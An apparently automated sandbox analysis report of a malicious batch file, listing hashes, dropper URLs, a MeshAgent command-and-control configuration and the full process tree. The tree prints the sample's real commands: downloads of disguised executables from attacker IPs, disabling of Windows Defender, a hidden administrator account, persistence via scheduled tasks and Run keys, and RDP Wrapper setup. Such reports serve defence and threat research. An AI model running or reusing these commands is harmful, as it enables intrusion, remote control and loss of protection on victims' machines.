Analysis

  • max time kernel
    136s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/10/2024, 17:40

General

  • Target

    xdr.bat

  • Size

    4KB

  • MD5

    9e779d369e3ca17fdc894d13c4fd797a

  • SHA1

    bf7e34e0da33a587177e66cfcec51f3aa75b4a87

  • SHA256

    15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

  • SHA512

    ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1

  • SSDEEP

    96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.yml

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/x222.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/WindowsUpdate.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/auto-install-hrdp.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/hrdp.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/update.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/autoupdate.zip

Extracted

Family

meshagent

Version

2

Botnet

hawlat

C2

http://45.139.196.71:443/agent.ashx

Attributes
  • mesh_id

    0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E

  • server_id

    71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB

  • wss

    wss://45.139.196.71:443/agent.ashx

Signatures

  • Detects MeshAgent payload 3 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 7 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in System32 directory 64 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 61 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 21 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 13 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1352
    • C:\Windows\system32\cmd.exe
      cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\system32\net.exe
        net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
        3⤵
          PID:4904
      • \??\UNC\45.139.196.250\shear\s.exe
        \\45.139.196.250\shear\s.exe -fullinstall
        2⤵
        • Sets service image path in registry
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        PID:4424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'c:\'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3024
      • C:\Windows\system32\net.exe
        net user t1 Raed12346@@ /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3588
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user t1 Raed12346@@ /add
          3⤵
            PID:3956
        • C:\Windows\system32\net.exe
          net localgroup administrators t1 /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators t1 /add
            3⤵
              PID:640
          • C:\Windows\system32\net.exe
            net localgroup Administratörer t1 /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administratörer t1 /add
              3⤵
                PID:904
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
              2⤵
              • Hide Artifacts: Hidden Users
              PID:4068
            • C:\Windows\system32\net.exe
              net user t1 /active:no
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:912
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user t1 /active:no
                3⤵
                  PID:852
              • C:\Windows\system32\net.exe
                net user t1 /active:yes
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user t1 /active:yes
                  3⤵
                    PID:4920
                • C:\Windows\system32\ReAgentc.exe
                  reagentc.exe /disable
                  2⤵
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  PID:3580
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
                  2⤵
                    PID:4512
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                    2⤵
                      PID:1200
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
                      2⤵
                        PID:2460
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
                        2⤵
                          PID:4988
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
                          2⤵
                            PID:4424
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1456
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                              2⤵
                              • Modifies Windows Defender Real-time Protection settings
                              PID:768
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
                              2⤵
                                PID:3720
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:1944
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:1420
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:3272
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:556
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4052
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4448
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2152
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4452
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5112
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:4076
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata\*.*
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2504
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:3528
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2556
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:5008
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2340
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:3872
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:3564
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2156
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C C:\ProgramData\Windata\installer.bat
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:2268
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3968
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4572
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C C:\ProgramData\Windata\hrdp\install.bat
                                        3⤵
                                          PID:556
                                          • C:\ProgramData\Windata\hrdp\RDPWInst.exe
                                            "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
                                            4⤵
                                            • Server Software Component: Terminal Services DLL
                                            • Executes dropped EXE
                                            • Modifies WinLogon
                                            • Drops file in System32 directory
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            PID:5040
                                            • C:\Windows\SYSTEM32\netsh.exe
                                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                              5⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:4828
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1752
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1648
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "update.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1288
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1244
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
                                          3⤵
                                          • Drops file in Program Files directory
                                          PID:4376
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil dirty query C:
                                            4⤵
                                              PID:3904
                                            • C:\Windows\system32\findstr.exe
                                              findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                              4⤵
                                                PID:2552
                                              • C:\Windows\system32\findstr.exe
                                                findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                4⤵
                                                  PID:4856
                                                • C:\Windows\system32\findstr.exe
                                                  findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                  4⤵
                                                    PID:5112
                                                  • C:\Windows\system32\findstr.exe
                                                    findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                    4⤵
                                                      PID:1488
                                                    • C:\Windows\system32\findstr.exe
                                                      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                      4⤵
                                                        PID:556
                                                      • C:\Windows\system32\findstr.exe
                                                        findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                        4⤵
                                                          PID:4444
                                                        • C:\Windows\system32\findstr.exe
                                                          findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                          4⤵
                                                            PID:3360
                                                          • C:\Windows\system32\findstr.exe
                                                            findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                            4⤵
                                                              PID:812
                                                            • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                              "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1908
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
                                                            3⤵
                                                            • Drops file in Program Files directory
                                                            PID:4552
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil dirty query C:
                                                              4⤵
                                                                PID:4472
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -u
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                PID:4992
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:2696
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                • Modifies WinLogon
                                                                • Drops file in Program Files directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4928
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:3252
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil dirty query C:
                                                                4⤵
                                                                  PID:5008
                                                                • C:\Windows\system32\findstr.exe
                                                                  findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                  4⤵
                                                                    PID:2720
                                                                  • C:\Windows\system32\findstr.exe
                                                                    findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                    4⤵
                                                                      PID:812
                                                                    • C:\Windows\system32\findstr.exe
                                                                      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                      4⤵
                                                                        PID:4648
                                                                      • C:\Windows\system32\findstr.exe
                                                                        findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                        4⤵
                                                                          PID:3516
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                          4⤵
                                                                            PID:2448
                                                                          • C:\Windows\system32\findstr.exe
                                                                            findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                            4⤵
                                                                              PID:1800
                                                                            • C:\Windows\system32\findstr.exe
                                                                              findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                              4⤵
                                                                                PID:964
                                                                              • C:\Windows\system32\findstr.exe
                                                                                findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                4⤵
                                                                                  PID:1900
                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3988
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
                                                                                3⤵
                                                                                  PID:3328
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil dirty query C:
                                                                                    4⤵
                                                                                      PID:4440
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3324
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4800
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
                                                                                    3⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2460
                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                      fsutil dirty query C:
                                                                                      4⤵
                                                                                        PID:632
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc queryex "TermService"
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4076
                                                                                      • C:\Windows\system32\find.exe
                                                                                        find "STATE"
                                                                                        4⤵
                                                                                          PID:4068
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find /v "RUNNING"
                                                                                          4⤵
                                                                                            PID:4528
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c query session rdp-tcp
                                                                                            4⤵
                                                                                              PID:1696
                                                                                              • C:\Windows\system32\query.exe
                                                                                                query session rdp-tcp
                                                                                                5⤵
                                                                                                  PID:2504
                                                                                                  • C:\Windows\system32\qwinsta.exe
                                                                                                    "C:\Windows\system32\qwinsta.exe" rdp-tcp
                                                                                                    6⤵
                                                                                                      PID:1320
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  PID:2468
                                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4928
                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                    netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                    5⤵
                                                                                                    • Modifies Windows Firewall
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    PID:2452
                                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies WinLogon
                                                                                                  • Drops file in Program Files directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1900
                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                    5⤵
                                                                                                    • Modifies Windows Firewall
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    PID:4272
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                  4⤵
                                                                                                    PID:4108
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                    4⤵
                                                                                                      PID:1944
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                                                                                      4⤵
                                                                                                        PID:1668
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                        4⤵
                                                                                                          PID:3156
                                                                                                          • C:\Windows\system32\cscript.exe
                                                                                                            cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                            5⤵
                                                                                                              PID:1736
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                                                                                            4⤵
                                                                                                              PID:5016
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                                                                                                5⤵
                                                                                                                  PID:3036
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
                                                                                                                4⤵
                                                                                                                  PID:1916
                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                  findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                  4⤵
                                                                                                                    PID:4528
